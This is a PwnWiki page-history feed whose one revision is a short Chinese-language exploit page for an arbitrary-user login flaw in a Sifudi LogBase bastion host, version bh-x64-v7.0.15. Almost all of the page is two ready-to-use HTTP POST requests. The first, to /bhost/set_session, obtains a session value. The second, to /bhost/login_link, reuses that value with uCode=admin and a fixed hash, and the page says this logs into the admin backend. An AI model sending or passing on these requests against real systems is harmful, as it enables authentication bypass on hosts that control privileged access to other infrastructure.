https://pwnwiki.com/index.php?action=history&feed=atom&title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E 思福迪堡壘機任意用戶登錄漏洞 - Revision history 2026-04-10T19:11:34Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E&diff=1684&oldid=prev Pwnwiki: Created page with "==影響範圍== LogBase-B798 bh-x64-v7.0.15 ==漏洞利用== 獲取INFO字段,u1參數值爲用戶名 <code>POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&m1=<..." 2021-04-15T09:16:16Z <p>Created page with &quot;==影響範圍== LogBase-B798 bh-x64-v7.0.15 ==漏洞利用== 獲取INFO字段,u1參數值爲用戶名 &lt;code&gt;POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&amp;m1=&lt;...&quot;</p> <p><b>New page</b></p><div>==影響範圍==<br /> LogBase-B798<br /> <br /> bh-x64-v7.0.15<br /> <br /> ==漏洞利用==<br /> <br /> 獲取INFO字段,u1參數值爲用戶名 &lt;code&gt;POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&amp;m1=&lt;/code&gt;獲得:<br /> <br /> &lt;code&gt;{&quot;result&quot;:true,&quot;info&quot;:&quot;1562205376847&quot;,&quot;ErrMsg&quot;:&quot;&quot;}&lt;/code&gt;<br /> <br /> <br /> 代入INFO字段進入如下請求a0參數值中<br /> <br /> uCode參數值爲用戶名<br /> &lt;pre&gt;<br /> POST /bhost/login_link HTTP/1.1Host: xx.xx.xx.xxa0=1562205376847&amp;a1=&amp;a10=2019-01-01+10:10:10&amp;ha=CADFDF26E649FB6284D2FD424BD294B6&amp;uCode=admin&amp;vdcode=<br /> &lt;/pre&gt;<br /> <br /> 利用後可成功登錄後臺</div> Pwnwiki